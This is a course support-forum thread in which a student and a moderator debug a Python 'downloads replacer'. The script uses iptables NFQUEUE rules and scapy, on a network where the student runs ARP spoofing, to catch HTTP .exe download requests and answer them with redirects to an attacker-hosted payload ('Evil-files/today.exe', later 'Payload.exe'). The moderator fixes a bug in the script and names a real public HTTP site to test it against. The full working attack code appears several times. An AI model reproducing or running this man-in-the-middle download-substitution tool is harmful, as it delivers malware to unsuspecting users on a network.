Viewing 15 posts - 1 through 15 (of 17 total)
  • Author
    Posts
  • #38763
    AvatarAlastair
    Participant

    Good afternoon,

    I’ve just completed the section for the downloads re-placer however when I run the programme it Isn’t doing anything. I’ve checked my code and compared it to yours and it seems okay. I’ve ran the iptables command and the echo command but nothing happens. I’ve tried it on the local machine and on a windows VM but no success.I am running the ARP spoofer in the background, as well as Apache server.

    any help would be greatly appreciated.

    #38804
    diegodiego
    Moderator

    Hi Alastair!
    First it has to work in local host.
    Can you share your code please? And the iptables rules used in this case?

    Thanks!
    Diego

    #38829
    AvatarAlastair
    Participant

    hello Diego, here is my code. i used the output and input rules for local machine and the forward rule for the windows vm

    #!/usr/bin/env python

    # run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE –queue-num 0
    # reset with >> iptables –flush

    import netfilterqueue
    import scapy.all as scapy

    ack_list = []

    def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

    def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
    if scapy_packet[scapy.TCP].dport == 80:
    if “.exe” in scapy_packet[scapy.Raw].load:
    print(“[+] exe Request”)
    ack_list.append(scapy_packet[scapy.TCP].ack)
    elif scapy_packet[scapy.TCP].sport == 80:
    if scapy_packet[scapy.TCP].seq in ack_list:
    ack_list.remove(scapy[scapy.TCP].seq)
    print(“[+] Replacing file”)
    modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)

    packet.set_payload(str(modified_packet))

    packet.accept()

    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    #38915
    diegodiego
    Moderator

    Hi!
    Thanks, but can you share it using identation? Use the CODE button

    For testing locally which sites are you using?

    Let me know.
    Diego

    #38929
    AvatarAlastair
    Participant

    apologies, hope this is better. I was using bing.com via firefox

    `#!/usr/bin/env python

    # run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE –queue-num 0
    # reset with >> iptables –flush

    import netfilterqueue
    import scapy.all as scapy

    ack_list = []

    def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

    def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
    if scapy_packet[scapy.TCP].dport == 80:
    if “.exe” in scapy_packet[scapy.Raw].load:
    print(“[+] exe Request”)
    ack_list.append(scapy_packet[scapy.TCP].ack)
    elif scapy_packet[scapy.TCP].sport == 80:
    if scapy_packet[scapy.TCP].seq in ack_list:
    ack_list.remove(scapy[scapy.TCP].seq)
    print(“[+] Replacing file”)
    modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)

    packet.set_payload(str(modified_packet))

    packet.accept()

    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    #38993
    diegodiego
    Moderator

    Hi!
    As you can see you shared again with out identation, once you’ve pasted yous code select it and click th CODE button.

    And for your testing sites please use a different one, a http site cause,first, Bing uses hsts protection and second Bing doesn’t provided any .exe to download from it. So please use a http site where you can download an .exe file.
    Later on the course you’ll learn to bypass https protection.

    Let me know how it goes!
    Diego

    #39007
    AvatarAlastair
    Participant

    3rd time lucky. sorry i was getting muddled, my code injector programme isnt responding either and i used bing for that one. i have tried the downloads replacer on winzip

    #!/usr/bin/env python
    
    # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE --queue-num 0
    # reset with >> iptables --flush
    
    import netfilterqueue
    import scapy.all as scapy
    
    ack_list = []
    
    def set_load(packet, load):
        packet[scapy.Raw].load = load
        del packet[scapy.IP].len
        del packet[scapy.IP].chksum
        del packet[scapy.TCP].chksum
        return packet
    
    def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        if scapy_packet.haslayer(scapy.Raw):
            if scapy_packet[scapy.TCP].dport == 80:
                if ".exe" in scapy_packet[scapy.Raw].load:
                    print("[+] exe Request")
                    ack_list.append(scapy_packet[scapy.TCP].ack)
            elif scapy_packet[scapy.TCP].sport == 80:
                if scapy_packet[scapy.TCP].seq in ack_list:
                    ack_list.remove(scapy[scapy.TCP].seq)
                    print("[+] Replacing file")
                    modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n")
    
                    packet.set_payload(str(modified_packet))
    
        packet.accept()
    
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()
    #39009
    AvatarAlastair
    Participant

    If this help i get this error when i try and run the programme:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    #39094
    diegodiego
    Moderator

    Hi!
    Thanks! Your code looks ok.

    Is the same case for winzip, it is a https site, please try it with:

    http://www.diabeticretinopathy.org.uk/exeforlaptops.html

    It’s not like the most fancy site but it works for testing.

    Let me know how it goes!
    Diego

    #39401
    AvatarAlastair
    Participant

    good morning,

    unfortunately running it against the suggested website had no effect. once i run the two commands for iptables (input,output) and then run the downloads replacer via python my screen just fills up with repeated error maessages:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    I also lose internet connection, i have run the echo 1 …. command but this has no effect

    #39503
    diegodiego
    Moderator

    Hi Alastair!

    I’ve checked your code once again and I found an error, in line:

    ack_list.remove(scapy[scapy.TCP].seq)

    You are missing the proper name of the packet which is scapy_packet, so it should be like:

    ack_list.remove(scapy_packet[scapy.TCP].seq)

    Change it and let me know how it goes!
    Diego

    #39660
    AvatarAlastair
    Participant

    hello Diego,

    I’ve corrected the code however it still runs with the same error as before:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    I’ve also noticed that when i run :
    iptables -I OUTPUT -j NFQUEUE –queue-num 0
    iptables -I INPUT -j NFQUEUE –queue-num 0

    I lose my internet connection and nothing loads

    #39735
    diegodiego
    Moderator

    Hi!
    Yeah, that’s normal (lossing internet) cause all the packets are being sent to queue 0 and if there’s no script using it they won’t be redirected properly, just flush iptables when you’re done.

    Can you share your corrected code again? Also share a screenshot of the error? I want to see where is it exactly ocurring based on the prints you have in your code.

    Let me know.
    Diego

    #39749
    AvatarAlastair
    Participant

    hello Diego,

    #!/usr/bin/env python
    
    # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE --queue-num 0
    # reset with >> iptables --flush
    
    import netfilterqueue
    import scapy.all as scapy
    
    ack_list = []
    
    def set_load(packet, load):
        packet[scapy.Raw].load = load
        del packet[scapy.IP].len
        del packet[scapy.IP].chksum
        del packet[scapy.TCP].chksum
        return packet
    
    def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        if scapy_packet.haslayer(scapy.Raw):
            if scapy_packet[scapy.TCP].dport == 80:
                if ".exe" in scapy_packet[scapy.Raw].load:
                    print("[+] exe Request")
                    ack_list.append(scapy_packet[scapy.TCP].ack)
            elif scapy_packet[scapy.TCP].sport == 80:
                if scapy_packet[scapy.TCP].seq in ack_list:
                    ack_list.remove(scapy_packet[scapy.TCP].seq)
                    print("[+] Replacing file")
                    modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.46/Files/Payload.exe\n\n")
    
                    packet.set_payload(str(modified_packet))
    
        packet.accept()
    
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    link to screenshot:

    https://1drv.ms/u/s!Amebr6-UtXCwjD4SQTE2wZsrwdwv

    thanks

    #39839
    diegodiego
    Moderator

    Hi!
    Are you still trying with the site I suggested or are you using a different one?
    Also I don’t know if it’s gonna work in official kali release as it has many bugs related to networking. I’ll suggest to use custom kali and see if you get the same result.

    Let me know how it goes!
    Diego

Viewing 15 posts - 1 through 15 (of 17 total)
  • You must be logged in to reply to this topic.